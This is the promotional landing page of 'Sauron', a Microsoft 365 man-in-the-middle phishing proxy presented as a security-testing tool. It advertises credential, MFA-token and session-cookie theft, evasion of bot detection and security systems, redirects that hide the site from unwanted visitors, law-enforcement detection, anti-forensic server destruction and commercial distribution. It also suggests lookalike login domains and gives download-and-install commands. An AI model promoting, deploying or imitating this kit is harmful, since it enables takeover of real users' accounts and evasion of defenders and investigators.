Advanced Microsoft 365 MITM Proxy for Security Testing
Capture credentials, harvest sessions, and monitor Microsoft 365 login flows in real-time with advanced evasion techniques and professional-grade infrastructure.
Built for security professionals who need reliable, advanced phishing infrastructure with enterprise-grade capabilities.
Full SSL/TLS MITM with automatic certificate generation and seamless Microsoft 365 flow capture.
WebSocket dashboard for live operation tracking with instant credential and session capture notifications.
Captures MFA tokens and maintains session persistence through cookie harvesting and replay attacks.
Bot detection bypass, traffic obfuscation, and anti-analysis measures to evade modern security systems.
Isolated operations with unique slugs, real-time statistics, and multi-target coordination capabilities.
Automatic SSL certificates, DNS management, and Cloudflare integration for professional-grade infrastructure.
Emergency VPS destruction with 5-stage annihilation, dead man's switch, and zero forensic traces.
Distributed VPS control with master/agent architecture, heartbeat monitoring, and command dispatch.
Smart redirect system blocks unauthorized visitors, redirecting them to real Microsoft services for stealth.
Get up and running in minutes with our streamlined setup process
Choose professional-looking domains:
securelogin365.com
authservice.com
cloudplatform.com
# Download latest release wget https://github.com/Skillz147/Sauron-Pro/releases/latest/download/sauron-linux-amd64.tar.gz # Extract and setup tar -xzf sauron-linux-amd64.tar.gz cd sauron # Interactive configuration ./configure-env.sh setup # Install and start sudo ./install-production.sh
💡 Tip: The interactive setup will guide you through getting your Cloudflare API token and Turnstile secret.
Comprehensive guides and technical documentation for the Sauron MITM proxy system.
Complete installation and configuration walkthrough
Environment variables, SSL, and system settings
Creating and managing operation slugs
AES-256 encryption, threat detection, and anti-forensics
HTTP security headers, CSP policies, and CORS configuration
Law enforcement detection and automatic response system
Enterprise scaling and commercial distribution
Administrative endpoints and cleanup operations
Complete API documentation with Firestore authentication
Advanced HMAC proof-of-possession authentication system
Comprehensive parameter guide for all endpoints
Real-time monitoring and data capture
Common issues and their solutions
Distributed VPS control and command system
Comprehensive fleet setup, operations, and security
Emergency VPS destruction system
Fleet, VPS, analytics, and monitoring endpoints
Essential parameters, commands, and authentication methods
Complete operation procedures (TOP SECRET)
Get help, report issues, and connect with other users